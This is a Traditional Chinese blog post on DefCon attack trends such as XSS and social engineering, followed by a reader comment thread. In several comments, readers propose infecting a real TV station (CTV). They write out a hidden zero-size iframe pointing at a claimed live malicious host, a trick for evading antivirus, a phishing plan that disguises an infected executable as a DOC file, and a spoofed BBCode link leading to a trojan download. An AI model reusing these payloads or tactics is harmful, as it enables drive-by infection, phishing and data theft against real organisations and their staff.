從全球兩大駭客年會看攻擊趨勢

(以下引述於從全球兩大駭客年會看攻擊趨勢)
….今年DefCon仍很重視Web本身的漏洞,不論是新的SQL Injection(SQL注入攻擊)手法,
或者是Web軟體的新弱點、新的網站檢測工具,甚至是利用社交工程手法,
進一步做到XSS(跨站腳本)攻擊,都是很明顯的趨勢…


社交工程學(Social Engineering)歷久不衰,科技果然始終來自於人性(茶);
可是XSS這東西一流行起來就不好玩了……
但稍微咕狗一下”expression
“或”XSS”,跑出來的東西還真是多到有點可怕 orz

文中有道:”如果臺灣遭遇到類似(此指愛沙尼亞)的網路攻擊,政府相關部門,是否有足夠能力可以應付呢?
(嘆氣)

迴響: 7 則迴響

文章分類:電腦相關

標籤:

在〈從全球兩大駭客年會看攻擊趨勢〉中有 7 則留言

  1. >>如果臺灣遭遇到類似(此指愛沙尼亞)的網路攻擊,政府相關部門,是否有足夠能力可以應付呢?
    我想大概沒有…不然就不會常常被大陸怪客換掉首頁了
    不過…其實也沒差啦
    網站的主機跟存放重要資料的主機通常是分開的 通常啦….

  2. 絕對沒有。
    從天才官員說,因為常常被駭,所以擋大陸網站「讓台灣公務員連不上大陸官方網頁」。就知道這群傢伙只會浪費納稅人的錢。
    >網站的主機跟存放重要資料的主機通常是分開的
    我深信曾大力表揚丁丁大站的政府腦殘絕對有的比。
    說到這個,這幾天爆發藝人辱宅事件,大群阿宅(看過龍貓之森站長文章後,決定跟著撇清關係……)到處鬼吼鬼叫,狂掃中視討論區。只會在網路上叫囂有屁用啊?我一直跟某相熟BLOGGER說:「世上有兩種傻瓜:一種因為受了威脅而不採取行動,另一種是因為威脅別人而認為自己已採取行動。」(《魔鬼與普里姆小姐》)都很乾脆的告訴她要惡意程式或問題網站隨時有一堆可以提供,公家機關網管出了名的爛,一人一信一病毒、外加在討論區用iframe嵌問題網頁,保證讓中視哭不出來。
    外行人都不懂恐怖活動需要決心、實質傷害、詳盡本益考量跟絕對不跟資產階級壓迫者妥協的堅定態度。寄病毒多輕鬆愉快啊,也不用阿宅離開電腦……

  3. >>因為常常被駭,所以擋大陸網站「讓台灣公務員連不上大陸官方網頁」
    我今天才知道有這種事 XD
    >>網站的主機跟存放重要資料的主機通常是分開的
    "通常"啦…….
    我猜事件個人其實不太了解呢,
    因為沒在看那節目,資訊來源都是K島或Blog,
    也不想為了這個去Youtube找(順代一提,ニコニコ動画也有得看….).
    不過從眾多Blog的報導,中視本身都以"節目效果"為由,
    似乎沒有什麼想要道歉的跡象….
    >>公家機關網管出了名的爛
    我又想到叫實習老師當網管這件事….
    >>討論區用iframe嵌問題網頁
    一般討論區能否運用iframe個人不太了解,
    只從XDite那看過相關介紹,我也沒什麼研究;
    倒是phpbb以前有個漏洞讓bbcode tag可使用xss….嗯,但好像早就補起來了.
    >>寄病毒多輕鬆愉快啊
    但我覺得中視根本就懶得開吶 XD

  4. 有支援HTML語法就能用,大概像這樣:
    <iframe src="hxxp://web.59cn.cn/huang246/mm.htm" width="0" height="0" border="0"></iframe>
    裡面那個網址是真的惡意網頁,有膽可以連過去測防毒。然後把高跟寬換成「1、123」之類就能避過多數防毒的標準病毒碼或啟發式偵測。只是蜂擁聲援的阿宅鄉民會先死一票吧……
    >但我覺得中視根本就懶得開吶 XD
    當然要先蒐集大量相關人員信箱,名字取個急件、劇本更動、緊急通知、臨時變更之類有的沒的,把exe全局感染病毒換個DOC圖示,名字改掉……或是什麼「不要難過!永遠支持!這是我們的心意!」之類,寄給內射會……社交工程法永遠是用網路幹壞事的精髓所在啊。

  5. 呃,我知道支援HTML就能用,
    貼ニコニコ動画也是用iframe….
    不過大部份的討論區都不給用HTML吧?
    >>裡面那個網址是真的惡意網頁
    感謝告知,您沒說我可能會點進去看,
    我不敢打沒把握的仗 XD
    >>寄給內射會
    大哥,寄給他們連圖示都不必換吧….
    您太高估對手了 XD

  6. >>大哥,寄給他們連圖示都不必換吧….
    >>您太高估對手了 XD
    我也不打沒把握的仗啊。
    如果用BBCODE的話,不知道能不能用物件塞……不然可以這樣:「
    台灣文化及大眾媒體監督協會將在9/23進行遊行活動,以行動進行對中視之抗爭,相關路線及行動要點請見網頁:
    [url=www.duowna.com/ief/url.asp]http://www.wretch.cc/blog/dingdingnews&article_id=8530829[/url]

    看得出玩的花招吧?看得到的內容從頭到尾都是真的(剛剛隨手去啥「台灣文化及大眾媒體監督協會」找來的),但LINK是假的。點進去網頁也只會一片白,只要防毒軟體掃不到,等到注意到網址不同時,木馬下載早被JS啟動了……可惜這種手法下載的程式多半是要盜資訊,不會有明顯傷害。一樣,那個LINK真的是惡意網頁……

  7. 這是害沒注意狀態列的人進入惡意網頁,
    和iframe手法不太一樣吧! XD
    但至少不會害到全部的瀏覽者就是……

發表迴響

這個網站採用 Akismet 服務減少垃圾留言。進一步瞭解 Akismet 如何處理網站訪客的留言資料